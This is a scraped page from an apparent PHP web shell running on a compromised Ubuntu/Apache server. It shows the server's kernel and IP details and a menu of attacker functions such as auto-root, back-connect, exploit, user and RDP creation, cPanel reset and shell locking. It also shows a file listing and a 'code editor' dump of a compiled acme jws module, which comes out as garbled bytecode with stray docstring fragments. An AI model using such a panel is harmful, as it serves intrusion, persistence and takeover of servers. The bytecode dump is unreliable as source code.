Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
acme /
__pycache__ /
[ HOME SHELL ]
Name
Size
Permission
Action
__init__.cpython-310.pyc
490
B
-rw-r--r--
challenges.cpython-310.pyc
20.04
KB
-rw-r--r--
client.cpython-310.pyc
40.74
KB
-rw-r--r--
crypto_util.cpython-310.pyc
13.69
KB
-rw-r--r--
errors.cpython-310.pyc
6.03
KB
-rw-r--r--
fields.cpython-310.pyc
2.65
KB
-rw-r--r--
jws.cpython-310.pyc
2.18
KB
-rw-r--r--
magic_typing.cpython-310.pyc
914
B
-rw-r--r--
messages.cpython-310.pyc
26.21
KB
-rw-r--r--
mixins.cpython-310.pyc
2.79
KB
-rw-r--r--
standalone.cpython-310.pyc
11.35
KB
-rw-r--r--
util.cpython-310.pyc
657
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : jws.cpython-310.pyc
o 6��aS � @ sR d Z ddlmZ ddlZG dd� dej�ZG dd� dej�ZG dd � d ej�ZdS ) z�ACME-specific JWS. The JWS implementation in josepy only implements the base JOSE standard. In order to support the new header fields defined in ACME, this module defines some ACME-specific classes that layer on top of josepy. � )�OptionalNc @ sV e Zd ZdZejddejd�Zejddd�Zejddd�Z ej ded efd d��ZdS ) �Headerz?ACME-specific JOSE Header. Implements nonce, kid, and url. �nonceT)� omitempty�encoder�kid)r �url�value�returnc C s8 zt �| �W S t jy } zt �d�|���d }~ww )NzInvalid nonce: {0})�jose�decode_b64jose�DeserializationError�format)r �error� r �*/usr/lib/python3/dist-packages/acme/jws.pyr s ��zHeader.nonceN) �__name__� __module__�__qualname__�__doc__r �Field�encode_b64joser r r �decoder�str�bytesr r r r r s r c @ s2 e Zd ZdZejjZeZ ej dde � e jd�ZdS )� SignaturezGACME-specific Signature. Uses ACME-specific Header for customer fields.�headerT)r �defaultr N) r r r r r r �_orig_slots� __slots__r � header_clsr � from_jsonr r r r r r s �r c sd e Zd ZdZeZejjZ e ddedejdej dee dee dee d ejf� fd d� �Z� ZS ) �JWSzCACME-specific JWS. Includes none, url, and kid in protected header.N�payload�key�algr r r r c s, |d u }t � j|||tg d��||||d�S )N)r r r �jwkr% )r$ r% �protectr r r �include_jwk)�super�sign� frozenset)�clsr# r$ r% r r r r( �� __class__r r r* 1 s �zJWS.sign)NN)r r r r r � signature_clsr r"